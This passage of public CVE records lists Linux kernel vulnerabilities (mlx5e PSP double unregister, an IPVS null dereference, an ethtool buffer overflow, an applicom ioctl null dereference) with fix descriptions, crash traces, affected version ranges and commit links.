"url": "https://git.kernel.org/stable/c/1adaea51c61b52e24e7ab38f7d3eba023b2d050d"
}
],
"title": "ipv6: fix a BUG in rt6_get_pcpu_route() under PREEMPT_RT",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71080",
"datePublished": "2026-01-13T15:34:44.832Z",
"dateReserved": "2026-01-13T15:30:19.648Z",
"dateUpdated": "2026-01-13T15:34:44.832Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68779 (GCVE-0-2025-68779)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:28 – Updated: 2026-01-13 15:28
Title
net/mlx5e: Avoid unregistering PSP twice
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/mlx5e: Avoid unregistering PSP twice
PSP is unregistered twice in:
_mlx5e_remove -> mlx5e_psp_unregister
mlx5e_nic_cleanup -> mlx5e_psp_unregister
This leads to a refcount underflow in some conditions:
------------[ cut here ]------------
refcount_t: underflow; use-after-free.
WARNING: CPU: 2 PID: 1694 at lib/refcount.c:28 refcount_warn_saturate+0xd8/0xe0
[...]
mlx5e_psp_unregister+0x26/0x50 [mlx5_core]
mlx5e_nic_cleanup+0x26/0x90 [mlx5_core]
mlx5e_remove+0xe6/0x1f0 [mlx5_core]
auxiliary_bus_remove+0x18/0x30
device_release_driver_internal+0x194/0x1f0
bus_remove_device+0xc6/0x130
device_del+0x159/0x3c0
mlx5_rescan_drivers_locked+0xbc/0x2a0 [mlx5_core]
[...]
Do not directly remove psp from the _mlx5e_remove path, the PSP cleanup
happens as part of profile cleanup.
Severity
No CVSS data available.
Impacted products
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlx5/core/en_main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e12c912f92ccea671b514caf371f28485714bb4b",
"status": "affected",
"version": "89ee2d92f66c45625ff1c173df2dbdea32568c5d",
"versionType": "git"
},
{
"lessThan": "35e93736f69963337912594eb3951ab320b77521",
"status": "affected",
"version": "89ee2d92f66c45625ff1c173df2dbdea32568c5d",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlx5/core/en_main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.18"
},
{
"lessThan": "6.18",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "6.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: Avoid unregistering PSP twice\n\nPSP is unregistered twice in:\n_mlx5e_remove -\u003e mlx5e_psp_unregister\nmlx5e_nic_cleanup -\u003e mlx5e_psp_unregister\n\nThis leads to a refcount underflow in some conditions:\n------------[ cut here ]------------\nrefcount_t: underflow; use-after-free.\nWARNING: CPU: 2 PID: 1694 at lib/refcount.c:28 refcount_warn_saturate+0xd8/0xe0\n[...]\n mlx5e_psp_unregister+0x26/0x50 [mlx5_core]\n mlx5e_nic_cleanup+0x26/0x90 [mlx5_core]\n mlx5e_remove+0xe6/0x1f0 [mlx5_core]\n auxiliary_bus_remove+0x18/0x30\n device_release_driver_internal+0x194/0x1f0\n bus_remove_device+0xc6/0x130\n device_del+0x159/0x3c0\n mlx5_rescan_drivers_locked+0xbc/0x2a0 [mlx5_core]\n[...]\n\nDo not directly remove psp from the _mlx5e_remove path, the PSP cleanup\nhappens as part of profile cleanup."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:28:54.795Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e12c912f92ccea671b514caf371f28485714bb4b"
},
{
"url": "https://git.kernel.org/stable/c/35e93736f69963337912594eb3951ab320b77521"
}
],
"title": "net/mlx5e: Avoid unregistering PSP twice",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68779",
"datePublished": "2026-01-13T15:28:54.795Z",
"dateReserved": "2025-12-24T10:30:51.036Z",
"dateUpdated": "2026-01-13T15:28:54.795Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68813 (GCVE-0-2025-68813)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-19 12:19
Title
ipvs: fix ipv4 null-ptr-deref in route error path
Summary
In the Linux kernel, the following vulnerability has been resolved:
ipvs: fix ipv4 null-ptr-deref in route error path
The IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()
without ensuring skb->dev is set, leading to a NULL pointer dereference
in fib_compute_spec_dst() when ipv4_link_failure() attempts to send
ICMP destination unreachable messages.
The issue emerged after commit ed0de45a1008 ("ipv4: recompile ip options
in ipv4_link_failure") started calling __ip_options_compile() from
ipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()
which dereferences skb->dev. An attempt was made to fix the NULL skb->dev
dereference in commit 0113d9c9d1cc ("ipv4: fix null-deref in
ipv4_link_failure"), but it only addressed the immediate dev_net(skb->dev)
dereference by using a fallback device. The fix was incomplete because
fib_compute_spec_dst() later in the call chain still accesses skb->dev
directly, which remains NULL when IPVS calls dst_link_failure().
The crash occurs when:
1. IPVS processes a packet in NAT mode with a misconfigured destination
2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route
3. The error path calls dst_link_failure(skb) with skb->dev == NULL
4. ipv4_link_failure() → ipv4_send_dest_unreach() →
__ip_options_compile() → fib_compute_spec_dst()
5. fib_compute_spec_dst() dereferences NULL skb->dev
Apply the same fix used for IPv6 in commit 326bf17ea5d4 ("ipvs: fix
ipv6 route unreach panic"): set skb->dev from skb_dst(skb)->dev before
calling dst_link_failure().
KASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]
CPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2
RIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233
RIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285
Call Trace:
<TASK>
spec_dst_fill net/ipv4/ip_options.c:232
spec_dst_fill net/ipv4/ip_options.c:229
__ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330
ipv4_send_dest_unreach net/ipv4/route.c:1252
ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265
dst_link_failure include/net/dst.h:437
__ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412
ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764
Severity
No CVSS data available.
Impacted products
| Vendor | Product |
|---|---|
| Linux | Linux |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/netfilter/ipvs/ip_vs_xmit.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "dd72a93c80408f06327dd2d956eb1a656d0b5903",
"status": "affected",
"version": "ed0de45a1008991fdaa27a0152befcb74d126a8b",
"versionType": "git"
},
{
"lessThan": "312d7cd88882fc6cadcc08b02287497aaaf94bcd",
"status": "affected",
"version": "ed0de45a1008991fdaa27a0152befcb74d126a8b",
"versionType": "git"
},
{
"lessThan": "cdeff10851c37a002d87a035818ebd60fdb74447",
"status": "affected",
"version": "ed0de45a1008991fdaa27a0152befcb74d126a8b",
"versionType": "git"
},
{
"lessThan": "4729ff0581fbb7ad098b6153b76b6f5aac94618a",
"status": "affected",
"version": "ed0de45a1008991fdaa27a0152befcb74d126a8b",
"versionType": "git"
},
{
"lessThan": "25ab24df31f7af843c96a38e0781b9165216e1a8",
"status": "affected",
"version": "ed0de45a1008991fdaa27a0152befcb74d126a8b",
"versionType": "git"
},
{
"lessThan": "689a627d14788ad772e0fa24c2e57a23dbc7ce90",
"status": "affected",
"version": "ed0de45a1008991fdaa27a0152befcb74d126a8b",
"versionType": "git"
},
{
"lessThan": "ad891bb3d079a46a821bf2b8867854645191bab0",
"status": "affected",
"version": "ed0de45a1008991fdaa27a0152befcb74d126a8b",
"versionType": "git"
},
{
"status": "affected",
"version": "6c2fa855d8178699706b1192db2f1f8102b0ba1e",
"versionType": "git"
},
{
"status": "affected",
"version": "fbf569d2beee2a4a7a0bc8b619c26101d1211a88",
"versionType": "git"
},
{
"status": "affected",
"version": "ff71f99d5fb2daf54340e8b290d0bc4e6b4c1d38",
"versionType": "git"
},
{
"status": "affected",
"version": "3d988fcddbe7b8673a231958bd2fba61b5a7ced9",
"versionType": "git"
},
{
"status": "affected",
"version": "8a430e56a6485267a1b2d3747209d26c54d1a34b",
"versionType": "git"
},
{
"status": "affected",
"version": "6bd1ee0a993fc9574ae43c1994c54a60cb23a380",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/netfilter/ipvs/ip_vs_xmit.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.1"
},
{
"lessThan": "5.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "3.18.139",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.4.179",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.9.171",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.14.114",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.19.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.0.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: fix ipv4 null-ptr-deref in route error path\n\nThe IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()\nwithout ensuring skb-\u003edev is set, leading to a NULL pointer dereference\nin fib_compute_spec_dst() when ipv4_link_failure() attempts to send\nICMP destination unreachable messages.\n\nThe issue emerged after commit ed0de45a1008 (\"ipv4: recompile ip options\nin ipv4_link_failure\") started calling __ip_options_compile() from\nipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()\nwhich dereferences skb-\u003edev. An attempt was made to fix the NULL skb-\u003edev\ndereference in commit 0113d9c9d1cc (\"ipv4: fix null-deref in\nipv4_link_failure\"), but it only addressed the immediate dev_net(skb-\u003edev)\ndereference by using a fallback device. The fix was incomplete because\nfib_compute_spec_dst() later in the call chain still accesses skb-\u003edev\ndirectly, which remains NULL when IPVS calls dst_link_failure().\n\nThe crash occurs when:\n1. IPVS processes a packet in NAT mode with a misconfigured destination\n2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route\n3. The error path calls dst_link_failure(skb) with skb-\u003edev == NULL\n4. ipv4_link_failure() \u2192 ipv4_send_dest_unreach() \u2192\n __ip_options_compile() \u2192 fib_compute_spec_dst()\n5. fib_compute_spec_dst() dereferences NULL skb-\u003edev\n\nApply the same fix used for IPv6 in commit 326bf17ea5d4 (\"ipvs: fix\nipv6 route unreach panic\"): set skb-\u003edev from skb_dst(skb)-\u003edev before\ncalling dst_link_failure().\n\nKASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]\nCPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2\nRIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233\nRIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285\nCall Trace:\n \u003cTASK\u003e\n spec_dst_fill net/ipv4/ip_options.c:232\n spec_dst_fill net/ipv4/ip_options.c:229\n __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330\n ipv4_send_dest_unreach net/ipv4/route.c:1252\n ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265\n dst_link_failure include/net/dst.h:437\n __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412\n ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:17.898Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/dd72a93c80408f06327dd2d956eb1a656d0b5903"
},
{
"url": "https://git.kernel.org/stable/c/312d7cd88882fc6cadcc08b02287497aaaf94bcd"
},
{
"url": "https://git.kernel.org/stable/c/cdeff10851c37a002d87a035818ebd60fdb74447"
},
{
"url": "https://git.kernel.org/stable/c/4729ff0581fbb7ad098b6153b76b6f5aac94618a"
},
{
"url": "https://git.kernel.org/stable/c/25ab24df31f7af843c96a38e0781b9165216e1a8"
},
{
"url": "https://git.kernel.org/stable/c/689a627d14788ad772e0fa24c2e57a23dbc7ce90"
},
{
"url": "https://git.kernel.org/stable/c/ad891bb3d079a46a821bf2b8867854645191bab0"
}
],
"title": "ipvs: fix ipv4 null-ptr-deref in route error path",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68813",
"datePublished": "2026-01-13T15:29:18.483Z",
"dateReserved": "2025-12-24T10:30:51.047Z",
"dateUpdated": "2026-01-19T12:19:17.898Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68795 (GCVE-0-2025-68795)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-19 12:19
Title
ethtool: Avoid overflowing userspace buffer on stats query
Summary
In the Linux kernel, the following vulnerability has been resolved:
ethtool: Avoid overflowing userspace buffer on stats query
The ethtool -S command operates across three ioctl calls:
ETHTOOL_GSSET_INFO for the size, ETHTOOL_GSTRINGS for the names, and
ETHTOOL_GSTATS for the values.
If the number of stats changes between these calls (e.g., due to device
reconfiguration), userspace's buffer allocation will be incorrect,
potentially leading to buffer overflow.
Drivers are generally expected to maintain stable stat counts, but some
drivers (e.g., mlx5, bnx2x, bna, ksz884x) use dynamic counters, making
this scenario possible.
Some drivers try to handle this internally:
- bnad_get_ethtool_stats() returns early in case stats.n_stats is not
equal to the driver's stats count.
- micrel/ksz884x also makes sure not to write anything beyond
stats.n_stats and overflow the buffer.
However, both use stats.n_stats which is already assigned with the value
returned from get_sset_count(), hence won't solve the issue described
here.
Change ethtool_get_strings(), ethtool_get_stats(),
ethtool_get_phy_stats() to not return anything in case of a mismatch
between userspace's size and get_sset_size(), to prevent buffer
overflow.
The returned n_stats value will be equal to zero, to reflect that
nothing has been returned.
This could result in one of two cases when using upstream ethtool,
depending on when the size change is detected:
1. When detected in ethtool_get_strings():
# ethtool -S eth2
no stats available
2. When detected in get stats, all stats will be reported as zero.
Both cases are presumably transient, and a subsequent ethtool call
should succeed.
Other than the overflow avoidance, these two cases are very evident (no
output/cleared stats), which is arguably better than presenting
incorrect/shifted stats.
I also considered returning an error instead of a "silent" response, but
that seems more destructive towards userspace apps.
Notes:
- This patch does not claim to fix the inherent race, it only makes sure
that we do not overflow the userspace buffer, and makes for a more
predictable behavior.
- RTNL lock is held during each ioctl, the race window exists between
the separate ioctl calls when the lock is released.
- Userspace ethtool always fills stats.n_stats, but it is likely that
these stats ioctls are implemented in other userspace applications
which might not fill it. The added code checks that it's not zero,
to prevent any regressions.
Severity
No CVSS data available.
Impacted products
| Vendor | Product |
|---|---|
| Linux | Linux |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ethtool/ioctl.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "3df375a1e75483b7d973c3cc2e46aa374db8428b",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "f9dc0f45d2cd0189ce666288a29d2cc32c2e44d5",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "4afcb985355210e1688560dc47e64b94dad35d71",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "ca9983bc3a1189bd72f9ae449d925a66b2616326",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "7bea09f60f2ad5d232e2db8f1c14e850fd3fd416",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "4066b5b546293f44cd6d0e84ece6e3ee7ff27093",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "7b07be1ff1cb6c49869910518650e8d0abc7d25f",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ethtool/ioctl.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.12"
},
{
"lessThan": "2.6.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "2.6.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nethtool: Avoid overflowing userspace buffer on stats query\n\nThe ethtool -S command operates across three ioctl calls:\nETHTOOL_GSSET_INFO for the size, ETHTOOL_GSTRINGS for the names, and\nETHTOOL_GSTATS for the values.\n\nIf the number of stats changes between these calls (e.g., due to device\nreconfiguration), userspace\u0027s buffer allocation will be incorrect,\npotentially leading to buffer overflow.\n\nDrivers are generally expected to maintain stable stat counts, but some\ndrivers (e.g., mlx5, bnx2x, bna, ksz884x) use dynamic counters, making\nthis scenario possible.\n\nSome drivers try to handle this internally:\n- bnad_get_ethtool_stats() returns early in case stats.n_stats is not\n equal to the driver\u0027s stats count.\n- micrel/ksz884x also makes sure not to write anything beyond\n stats.n_stats and overflow the buffer.\n\nHowever, both use stats.n_stats which is already assigned with the value\nreturned from get_sset_count(), hence won\u0027t solve the issue described\nhere.\n\nChange ethtool_get_strings(), ethtool_get_stats(),\nethtool_get_phy_stats() to not return anything in case of a mismatch\nbetween userspace\u0027s size and get_sset_size(), to prevent buffer\noverflow.\nThe returned n_stats value will be equal to zero, to reflect that\nnothing has been returned.\n\nThis could result in one of two cases when using upstream ethtool,\ndepending on when the size change is detected:\n1. When detected in ethtool_get_strings():\n # ethtool -S eth2\n no stats available\n\n2. When detected in get stats, all stats will be reported as zero.\n\nBoth cases are presumably transient, and a subsequent ethtool call\nshould succeed.\n\nOther than the overflow avoidance, these two cases are very evident (no\noutput/cleared stats), which is arguably better than presenting\nincorrect/shifted stats.\nI also considered returning an error instead of a \"silent\" response, but\nthat seems more destructive towards userspace apps.\n\nNotes:\n- This patch does not claim to fix the inherent race, it only makes sure\n that we do not overflow the userspace buffer, and makes for a more\n predictable behavior.\n\n- RTNL lock is held during each ioctl, the race window exists between\n the separate ioctl calls when the lock is released.\n\n- Userspace ethtool always fills stats.n_stats, but it is likely that\n these stats ioctls are implemented in other userspace applications\n which might not fill it. The added code checks that it\u0027s not zero,\n to prevent any regressions."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:07.130Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/3df375a1e75483b7d973c3cc2e46aa374db8428b"
},
{
"url": "https://git.kernel.org/stable/c/f9dc0f45d2cd0189ce666288a29d2cc32c2e44d5"
},
{
"url": "https://git.kernel.org/stable/c/4afcb985355210e1688560dc47e64b94dad35d71"
},
{
"url": "https://git.kernel.org/stable/c/ca9983bc3a1189bd72f9ae449d925a66b2616326"
},
{
"url": "https://git.kernel.org/stable/c/7bea09f60f2ad5d232e2db8f1c14e850fd3fd416"
},
{
"url": "https://git.kernel.org/stable/c/4066b5b546293f44cd6d0e84ece6e3ee7ff27093"
},
{
"url": "https://git.kernel.org/stable/c/7b07be1ff1cb6c49869910518650e8d0abc7d25f"
}
],
"title": "ethtool: Avoid overflowing userspace buffer on stats query",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68795",
"datePublished": "2026-01-13T15:29:06.217Z",
"dateReserved": "2025-12-24T10:30:51.041Z",
"dateUpdated": "2026-01-19T12:19:07.130Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68797 (GCVE-0-2025-68797)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-19 12:19
Title
char: applicom: fix NULL pointer dereference in ac_ioctl
Summary
In the Linux kernel, the following vulnerability has been resolved:
char: applicom: fix NULL pointer dereference in ac_ioctl
Discovered by Atuin - Automated Vulnerability Discovery Engine.
In ac_ioctl, the validation of IndexCard and the check for a valid
RamIO pointer are skipped when cmd is 6. However, the function
unconditionally executes readb(apbs[IndexCard].RamIO + VERS) at the
end.
If cmd is 6, IndexCard may reference a board that does not exist
(where RamIO is NULL), leading to a NULL pointer dereference.
Fix this by skipping the readb access when cmd is 6, as this
command is a global information query and does not target a specific
board context.
Severity
No CVSS data available.
Impacted products
| Vendor | Product |
|---|---|
| Linux | Linux |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/char/applicom.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "5a6240804fb7bbd4f5f6e706955248a6f4c1abbc",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d1b0452280029d05a98c75631131ee61c0b0d084",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "0b8b353e09888bccee405e0dd6feafb60360f478",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d285517429a75423789e6408653e57b6fdfc8e54",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "74883565c621eec6cd2e35fe6d27454cf2810c23",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "f83e3e9f89181b42f6076a115d767a7552c4a39e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "82d12088c297fa1cef670e1718b3d24f414c23f7",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/char/applicom.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.12"
},
{
"lessThan": "2.6.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
